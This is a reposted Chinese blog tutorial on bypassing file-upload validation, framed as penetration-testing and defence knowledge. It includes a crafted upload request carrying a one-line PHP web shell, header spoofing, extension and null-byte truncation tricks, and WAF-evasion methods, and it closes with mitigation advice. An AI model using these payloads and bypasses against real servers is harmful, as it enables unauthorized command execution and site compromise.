文件上传漏洞(绕过姿势)【转】

文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)

文件上传校验姿势

  • 客户端javascript校验(一般只校验后缀名)
  • 服务端校验

    • 文件头content-type字段校验(image/gif)
    • 文件内容头校验(GIF89a)
    • 后缀名黑名单校验
    • 后缀名白名单校验
    • 自定义正则校验
  • WAF设备校验(根据不同的WAF产品而定)



1.客户端校验  

一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。

  判断方式:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传.jpg/.jpeg/.png后缀名的文件,而此时并没有发送数据包。

2.服务端校验2.1 content-type字段校验  

这里以PHP代码为例,模拟web服务器端的校验代码

[PHP] 纯文本查看 复制代码
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
<?php[/size]
[size=3]        if($_FILES['userfile']['type'] != "image/gif")  #这里对上传的文件类型进行判断,如果不是image/gif类型便返回错误。[/size]
[size=3]                {   [/size]
[size=3]                 echo "Sorry, we only allow uploading GIF images";[/size]
[size=3]                 exit;[/size]
[size=3]                 }[/size]
[size=3]         $uploaddir = 'uploads/';[/size]
[size=3]         $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);[/size]
[size=3]         if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile))[/size]
[size=3]             {[/size]
[size=3]                 echo "File is valid, and was successfully uploaded.\n";[/size]
[size=3]                } else {[/size]
[size=3]                     echo "File uploading failed.\n";[/size]
[size=3]    }[/size]
[size=3]     ?>

可以看到代码对上传文件的文件类型进行了判断,如果不是图片类型,返回错误。

2.2 文件头校验  
可以通过自己写正则匹配,判断文件头内容是否符合要求,这里举几个常见的文件头对应关系:
(1)  .JPEG;.JPE;.JPG,”JPGGraphic File”
(2)  .gif,”GIF 89A”
(3)  .zip,”Zip Compressed”
(4)  .doc;.xls;.xlt;.ppt;.apr,”MS Compound Document v1 or Lotus Approach APRfile”


文件上传绕过校验姿势

  • 客户端绕过(抓包改包)
  • 服务端绕过

    • 文件类型
    • 文件头
    • 文件后缀名
  • 配合文件包含漏洞绕过
  • 配合服务器解析漏洞绕过
  • CMS、编辑器漏洞绕过
  • 配合操作系统文件命名规则绕过
  • 配合其他规则绕过
  • WAF绕过



1.客户端绕过  
可以利用burp抓包改包,先上传一个gif类型的木马,然后通过burp将其改为asp/php/jsp后缀名即可。

2.服务端绕过


2.1 文件类型绕过
  我们可以通过抓包,将content-type字段改为image/gif

[HTML] 纯文本查看 复制代码
01
02
03
04
05
06
07
08
09
10
11
12
POST /upload.php HTTP/1.1[/size]
[size=3]TE: deflate,gzip;q=0.3[/size]
[size=3]Connection: TE, close[/size]
[size=3]Host: localhost[/size]
[size=3]User-Agent: libwww-perl/5.803[/size]
[size=3]Content-Type: multipart/form-data; boundary=xYzZY[/size]
[size=3]Content-Length: 155[/size]
[size=3]--xYzZY[/size]
[size=3]Content-Disposition: form-data; name="userfile"; filename="shell.php"[/size]
[size=3]Content-Type: image/gif (原为 Content-Type: text/plain)[/size]
[size=3]<?php system($_GET['command']);?>[/size]
[size=3]--xYzZY-

2.2 文件头绕过  
在木马内容基础上再加了一些文件信息,有点像下面的结构
GIF89a<?php phpinfo(); ?>

2.3 文件后缀名绕过
前提:黑名单校验
黑名单检测:一般有个专门的 blacklist 文件,里面会包含常见的危险脚本文件。
绕过方法:
(1)找黑名单扩展名的漏网之鱼 – 比如 asa 和 cer 之类
(2)可能存在大小写绕过漏洞 – 比如 aSp 和 pHp 之类
能被解析的文件扩展名列表:
jsp  jspx  jspf
asp  asa cer aspx

3.配合文件包含漏洞
前提:校验规则只校验当文件后缀名为asp/php/jsp的文件内容是否为木马。
绕过方式:(这里拿php为例,此漏洞主要存在于PHP中)
(1)先上传一个内容为木马的txt后缀文件,因为后缀名的关系没有检验内容;
(2)然后再上传一个.php的文件,内容为<?php Include(“上传的txt文件路径”);?>
此时,这个php文件就会去引用txt文件的内容,从而绕过校验,下面列举包含的语法:

[PHP] 纯文本查看 复制代码
1
2
3
4
5
6
7
8
#PHP    [/size]
[size=3]<?php Include("上传的txt文件路径");?> [/size]
[size=3]#ASP    [/size]
[size=3]<!--#include file="上传的txt文件路径" -->[/size]
[size=3]#JSP    [/size]
[size=3]<jsp:inclde page="上传的txt文件路径"/>[/size]
[size=3]or  [/size]
[size=3]<%[url=home.php?mod=space&uid=56332]@include[/url] file="上传的txt文件路径"%>

4.配合服务器解析漏洞
详细可参考:http://thief.one/2016/09/21/服务器解析漏洞/

5.配合操作系统文件命令规则
(1)上传不符合windows文件命名规则的文件名
  test.asp.
  test.asp(空格)
  test.php:1.jpg
  test.php:: $DATA
会被windows系统自动去掉不符合规则符号后面的内容。
(2)linux下后缀名大小写
在linux下,如果上传php不被解析,可以试试上传pHp后缀的文件名。

6.CMS、编辑器漏洞
(1)CMS漏洞:比如说JCMS等存在的漏洞,可以针对不同CMS存在的上传漏洞进行绕过。
(2)编辑器漏洞:比如FCK,ewebeditor等,可以针对编辑器的漏洞进行绕过。
这两方面的漏洞以后单独成文汇总,这里点到为止。

7.配合其他规则
(1)0x00截断:基于一个组合逻辑漏洞造成的,通常存在于构造上传文件路径的时候
  test.php(0x00).jpg
  test.php%00.jpg
  路径/upload/1.php(0x00),文件名1.jpg,结合/upload/1.php(0x00)/1.jpg
伪代码演示:

[PHP] 纯文本查看 复制代码
1
2
3
4
5
name= getname(httprequest) //假如这时候获取到的文件名是 help.asp.jpg(asp 后面为 0x00)[/size]
[size=3]type =gettype(name)        //而在 gettype()函数里处理方式是从后往前扫描扩展名,所以判断为 jpg[/size]
[size=3]if(type == jpg)[/size]
[size=3]   SaveFileToPath(UploadPath.name, name)   //但在这里却是以 0x00 作为文件名截断[/size]
[size=3]//最后以 help.asp 存入路径里


8.WAF绕过

8.1 垃圾数据  
有些主机WAF软件为了不影响web服务器的性能,会对校验的用户数据设置大小上限,比如1M。此种情况可以构造一个大文件,前面1M的内容为垃圾内容,后面才是真正的木马内容,便可以绕过WAF对文件内容的校验;


当然也可以将垃圾数据放在数据包最开头,这样便可以绕过对文件名的校验。

8.2 filename
针对早期版本安全狗,可以多加一个filename

8.3 POST/GET
有些WAF的规则是:如果数据包为POST类型,则校验数据包内容。
此种情况可以上传一个POST型的数据包,抓包将POST改为GET。
8.4 以上方式

针对WAF,以上介绍的服务器解析漏洞、文件包含漏洞等都可以尝试绕过。


文件校验的几点建议

  • 文件扩展名服务端白名单校验。
  • 文件内容服务端校验。
  • 上传文件重命名。
  • 隐藏上传文件路径。


以上几点,可以防御绝大多数上传漏洞,但是需要跟服务器容器结合起来。如果解析漏洞依然存在,那么没有绝对的安全。

来源:文件上传漏洞(绕过姿势)

此条目发表在未分类, 漏洞攻击分类目录。将固定链接加入收藏夹。